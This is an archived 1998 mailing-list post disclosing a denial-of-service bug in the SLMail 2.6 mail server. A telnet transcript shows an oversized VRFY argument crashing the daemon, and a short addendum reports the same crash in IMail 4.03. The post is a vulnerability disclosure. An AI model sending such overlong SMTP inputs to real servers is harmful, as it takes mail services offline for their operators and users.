[ http://www.rootshell.com/ ] Date: Wed, 11 Mar 1998 20:44:56 -0500 From: Steven Subject: SLMail 2.6 DoS Hello, I have recently found a quite serious DoS attack for the SLMail 2.6 email daemon (www.seattlelabs.com/slmail). A long string of text after a command makes the program crash. I have only tested this on 2.6, so I'm not sure if other versions are vulnerable. craphole:~$ telnet www.victim.com 25 Trying 555.55.555.55... Connected to www.victim.com. Escape character is '^]'. 220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here vrfy dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd Connection closed by foreign host. craphole:~$ telnet www.victim.com 25 Trying 555.55.555.55... telnet: Unable to connect to remote host: Connection refused craphole:~$ It will stay unresponsive until manually restarted. I haven't mailed Seattle Labs about this, but I'm sure they'll figure it out. Later, Cisc0 @ Undernet steven@efni.com ------------------------------------------------------------ Out of boredom, I tried another smtp daemon for Windows, IMail (I tried 4.03) by IPSwitch (www.ipswitch.com). Which crashed the same way. Pretty strange, I've only tried two windowsNT smtp daemons, and both crashed the same way... Cisc0 @ Undernet steven@efni.com